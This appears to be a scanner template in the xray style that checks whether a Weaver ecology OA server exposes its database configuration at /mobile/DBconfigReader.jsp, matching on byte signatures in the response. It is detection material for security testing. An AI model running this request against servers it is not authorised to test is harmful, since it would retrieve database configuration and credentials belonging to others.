id: ecology-oa-database-info-leak

info:
  name: 泛微ecology OA 数据库配置信息泄露
  author: jas502n
  severity: high
  verified: true
  description: |
    泛微ecology OA系统接口存在数据库配置信息泄露漏洞
  reference:
    - https://github.com/jas502n/DBconfigReader
  tags: ecology,leak,database
  created: 2023/06/23

rules:
  r0:
    request:
      method: GET
      path: /mobile/DBconfigReader.jsp
    expression: response.status == 200 && (response.body.bcontains(b'\x70\x05\x53\x6e') || response.body.bcontains(b'\x70\x05\x40\x73'))
expression: r0()